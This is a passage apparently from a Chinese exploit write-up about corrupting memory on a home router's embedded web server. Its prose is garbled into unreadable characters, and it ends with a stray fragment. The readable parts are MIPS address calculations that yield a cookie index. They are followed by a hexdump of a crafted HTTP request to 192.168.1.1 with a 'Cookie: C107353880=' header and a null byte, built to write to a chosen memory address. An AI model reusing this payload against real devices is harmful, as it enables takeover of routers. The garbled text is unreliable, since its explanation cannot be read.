���ˣ� ����������Ҫʵ�ֵģ�EPCΪ 0��00000000������֮��$s7��ֵΪ0x8040F8AC Ҳ����������Ѱ�ҵ�$s4��ֵ

���ڣ�����֪����$s4��ֵΪ0x8040F8AC������$t5��ֵΪ0x804163D4����0x804163D4�Ƕ�Ŀ�ĵ�ַ����д�����Ļ�ַ����Ϊ������Ҫ����0x8034FF94��ֵ�����ԣ�

0x8034FF94- 0x804163D4 = 0xFFF39BC0     # do thisin dword 0xFFF39BC0% 0x28 = 0                   # do this inqword 0xFFF39BC0/ 0x28 = 0x06661718           # do thisin qword 0x06661718= 107353880 (in decimal)

��Ϊ��ַ0x8034FF94������0��28�ֽڶ����chunk�еĵ�һ���ֽڣ�����������ֻ��ͨ��null(0��00)����һ���ֽڡ�Ȼ�����������ͨ��curl��·�ɷ���һ���ر�������ݰ����е㲻ǡ������Ϊcurl����0x0d0a0d0a���header����Ϊ�����nc�������ر�������ݰ���һ�����õ�ѡ�񡣽�����ر�������ݰ������һ���ļ���ͨ���ܵ�����nc�ٷ�����·����Զ�̡�������������������������

cawan$ cat./cawan_header | xxd 0000000:4745 5420 2f20 4854 5450 2f31 2e31 0a55 GET / HTTP/1.1.U 0000010:7365 722d 4167 656e 743a 2063 7572 6c2f ser-Agent: curl/ 0000020:372e 3333 2e30 0a48 6f73 743a 2031 3932 7.33.0.Host: 192 0000030:2e31 3638 2e31 2e31 0a41 6363 6570 743a .168.1.1.Accept: 0000040:202a 2f2a 0a43 6f6f 6b69 653a 2043 3130  */*.Cookie: C10 0000050:3733 3533 3838 303d 000a                7353880=..cawan$curl 192.168.1.1

ProtectedObject